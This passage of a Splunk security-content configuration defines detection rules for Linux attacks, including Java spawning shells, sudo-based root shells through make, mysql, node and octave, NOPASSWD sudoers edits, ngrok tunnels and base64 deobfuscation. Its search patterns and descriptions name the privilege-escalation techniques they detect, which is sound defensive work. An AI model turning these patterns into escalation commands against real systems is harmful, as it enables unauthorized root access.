legitimacy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering may be required on internal developer build systems or classify assets as web facing and restrict the analytic based on asset type. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Java Spawning Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Spring4Shell CVE-2022-22965", "Hermetic Wiper", "Log4Shell CVE-2021-44228"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ spawning a Linux shell, potentially indicative of exploitation. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Java Spawning Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Spring4Shell CVE-2022-22965", "Hermetic Wiper", "Log4Shell CVE-2021-44228"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh', "tcsh', "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. action.notable.param.rule_title = Linux Java Spawning Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=java OR Processes.parent_process_name=apache OR Processes.parent_process_name=tomcat `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_java_spawning_shell_filter` [ESCU - Linux Kernel Module Enumeration - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the process kmod being utilized to list kernel modules in use. Typically, this is not seen as malicious, however it may be a precurser to the use of insmod to install a module. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082", "T1014"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the process kmod being utilized to list kernel modules in use. Typically, this is not seen as malicious, however it may be a precurser to the use of insmod to install a module. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Kernel Module Enumeration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Rootkit"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ enumeration kernel modules. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Kernel Module Enumeration - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Rootkit"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1082", "T1014"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=kmod Processes.process IN ("*lsmod*", "*list*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_kernel_module_enumeration_filter` [ESCU - Linux Kworker Process In Writable Process Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious process kworker commandline in a linux machine. kworker process name or thread are common names of kernel threads in linux process. This hunting detections can lead to investigate process contains process path in writable directory in linux like /home/, /var/log and /tmp/. This technique was seen in cyclopsblink malware to blend its core and other of its child process as normal kworker on the compromised machine. This detection might be a good pivot to look for other IOC related to cyclopsblink malware or attacks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.004", "T1036"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious process kworker commandline in a linux machine. kworker process name or thread are common names of kernel threads in linux process. This hunting detections can lead to investigate process contains process path in writable directory in linux like /home/, /var/log and /tmp/. This technique was seen in cyclopsblink malware to blend its core and other of its child process as normal kworker on the compromised machine. This detection might be a good pivot to look for other IOC related to cyclopsblink malware or attacks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-12 action.escu.modification_date = 2023-04-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Kworker Process In Writable Process Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Sandworm Tools", "Cyclops Blink"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Kworker Process In Writable Process Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Sandworm Tools", "Cyclops Blink"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.004", "T1036"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process = "*[kworker/*" Processes.parent_process_path IN ("/home/*", "/tmp/*", "/var/log/*") Processes.process="*iptables*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_path Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_kworker_process_in_writable_process_path_filter` [ESCU - Linux Make Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The Linux make command is used to build and maintain groups of programs and files from the source code. In Linux, it is one of the most frequently used commands by the developers. It assists developers to install and compile many utilities from the terminal. If sudo right is given to make utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The Linux make command is used to build and maintain groups of programs and files from the source code. In Linux, it is one of the most frequently used commands by the developers. It assists developers to install and compile many utilities from the terminal. If sudo right is given to make utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Make Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Make Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*make*-s*" AND Processes.process="*--eval*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_make_privilege_escalation_filter` [ESCU - Linux MySQL Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = MySQL is an open-source relational database management system. Its name is a combination of "My", the name of co-founder Michael Widenius's daughter My, and "SQL", the abbreviation for Structured Query Language. If sudo right is given to mysql utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = MySQL is an open-source relational database management system. Its name is a combination of "My", the name of co-founder Michael Widenius's daughter My, and "SQL", the abbreviation for Structured Query Language. If sudo right is given to mysql utility for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-08-09 action.escu.modification_date = 2022-08-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux MySQL Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux MySQL Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*mysql*-e*" AND Processes.process="*\!**" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_mysql_privilege_escalation_filter` [ESCU - Linux Ngrok Reverse Proxy Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of Ngrok being utilized on the Linux operating system. Unfortunately, there is no original file name for Ngrok, so it may be worth an additional hunt to identify any command-line arguments. The sign of someone using Ngrok is not malicious, however, more recently it has become an adversary tool. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1572", "T1090", "T1102"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of Ngrok being utilized on the Linux operating system. Unfortunately, there is no original file name for Ngrok, so it may be worth an additional hunt to identify any command-line arguments. The sign of someone using Ngrok is not malicious, however, more recently it has become an adversary tool. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if Ngrok is an authorized utility. Filter as needed. action.escu.creation_date = 2023-01-12 action.escu.modification_date = 2023-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Ngrok Reverse Proxy Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Reverse Network Proxy"] action.risk = 1 action.risk.param._risk_message = A reverse proxy was identified spawning from $parent_process_name$ - $process_name$ on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 50}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Ngrok Reverse Proxy Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Reverse Network Proxy"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1572", "T1090", "T1102"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ngrok Processes.process IN ("*start*", "*--config*","*http*","*authtoken*", "*http*", "*tcp*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ngrok_reverse_proxy_usage_filter` [ESCU - Linux Node Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Node.js is a back-end JavaScript runtime environment that is open-source, cross-platform, runs on the V8 engine, and executes JavaScript code outside of a web browser. It was created to help create scalable network applications. If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Node.js is a back-end JavaScript runtime environment that is open-source, cross-platform, runs on the V8 engine, and executes JavaScript code outside of a web browser. It was created to help create scalable network applications. If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-07-31 action.escu.modification_date = 2022-07-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Node Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 40}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Node Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sudo*node*" AND Processes.process="*-e*" AND Processes.process="*child_process.spawn*" AND Processes.process="*stdio*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_node_privilege_escalation_filter` [ESCU - Linux NOPASSWD Entry In Sudoers File - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for suspicious command lines that may add entry to /etc/sudoers with NOPASSWD attribute in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain elevated privilege to the targeted or compromised host. /etc/sudoers file controls who can run what commands users can execute on the machines and can also control whether user need a password to execute particular commands. This file is composed of aliases (basically variables) and user specifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for suspicious command lines that may add entry to /etc/sudoers with NOPASSWD attribute in linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to gain elevated privilege to the targeted or compromised host. /etc/sudoers file controls who can run what commands users can execute on the machines and can also control whether user need a password to execute particular commands. This file is composed of aliases (basically variables) and user specifications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux NOPASSWD Entry In Sudoers File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux NOPASSWD Entry In Sudoers File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*NOPASSWD:*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_nopasswd_entry_in_sudoers_file_filter` [ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of base64 decode on Linux being utilized to deobfuscate a file. Identify the source of the file and determine if legitimate. Review parallel processes for further behavior before and after. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of base64 decode on Linux being utilized to deobfuscate a file. Identify the source of the file and determine if legitimate. Review parallel processes for further behavior before and after. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and will require some tuning based on processes. Filter as needed. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ decoding base64. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Obfuscated Files or Information Base64 Decode - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*base64 -d*","*base64 --decode*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_obfuscated_files_or_information_base64_decode_filter` [ESCU - Linux Octave Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = GNU Octave is a high-level programming language primarily intended for scientific computing and numerical computation. Octave helps in solving linear and nonlinear problems numerically, and for performing other numerical experiments using a language that is mostly compatible with MATLAB. If sudo right is given to the application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = GNU Octave is a high-level programming language primarily intended for scientific computing and numerical computation. Octave helps in solving linear and nonlinear problems numerically, and for performing other numerical experiments using a language that is mostly compatible with MATLAB. If sudo right is given to the application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Octave Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] 